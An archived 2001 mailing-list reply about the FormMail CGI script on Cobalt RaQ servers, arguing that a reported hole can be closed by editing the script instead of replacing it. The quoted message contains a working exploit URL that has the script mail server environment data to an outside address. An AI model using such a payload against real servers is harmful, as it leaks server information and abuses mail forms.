[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] CGI email

Subject: Re: [cobalt-users] CGI email
From: Keith Davis <cache@xxxxxxxxxx>
Date: Thu May 10 08:57:05 2001
Organization: Digital Odyssey Web Development
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Dan Kriwitsky wrote:

> Checking what out? The expoit they published works.
> Exploit:
> http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@
> dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>
> 

Exactly my point. It's a feature that does indeed work. It's also a
feature that can be turned off in at least 3 places in the script.

Comparison. A RaQ comes with telnet installed as a feature but we all
know how insecure that is. To get secure we install SSH and turn telnet
off, we don't throw the RaQ away. In short, we don't use the thing fresh
out of the box and expect it to be as secure as we might like. There are
posts galore on this list about how to turn off one feature or another
to harden a RaQ. All I'm saying is that no one should expect to use any
canned script, or any canned server, without some tinkering. 

I just hate to see someone being told he has to install something else
and tell his clients that they have to redo all those forms that they
probably didn't understand the first time, when patching what he has
will take only a few minutes.

keith

Follow-Ups:
- Re: [cobalt-users] CGI email
  - From: Aeron Jarrett

References:
- RE: [cobalt-users] CGI email
  - From: Dan Kriwitsky

Prev by Date: [cobalt-users] Xtr shortcoming
Next by Date: Re: [cobalt-users] the ircservices@xxxxxxxxxxxxx dude
Previous by thread: RE: [cobalt-users] CGI email
Next by thread: Re: [cobalt-users] CGI email

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index